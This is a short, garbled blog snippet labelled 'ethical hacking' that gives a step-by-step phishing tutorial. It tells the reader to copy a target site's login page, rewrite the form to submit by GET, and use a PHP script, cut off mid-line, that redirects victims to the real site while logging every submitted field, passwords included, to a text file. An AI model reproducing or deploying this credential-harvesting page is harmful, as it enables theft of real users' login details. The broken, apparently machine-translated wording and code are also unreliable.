ETHICAL HACKING

ETHICAL HACKING

ethicalhackingnow.blogspot.com - Visit Profile

Welcome to ethical hacking

tutorial:-

1. Open the site that you want to create from the page.

2. After opening the site, wait until it is fully loaded. Right-click on the save page as option and save the page in full web page mode.

3. Now open the page with notepad and hit Ctrl + F to find the option. Write it, login and the file. Probably behind the login by the action. Well, we need the login. It is possible to login with a php extension (which is high) or aspx or anything else stored. I provided the tutorial for php. Well, if there's anyway login.php, delete it, just login.php. Then if method = "post", you will change it to method = "GET".

4. Now open it up with a new notepad, drop this code down:

code:

<? php

header ('Location: target.com');

$ handle = fopen ("log.txt", "a");

foreach ($ _GET as $ variable => $ value) {

fwrite ($ handle, $ variable);

fwrite ($ handle, "=");

fwrite ($ handle, $ value);

fwrite ($ han…

Source ethicalhackingnow.blogspot.com

Report Page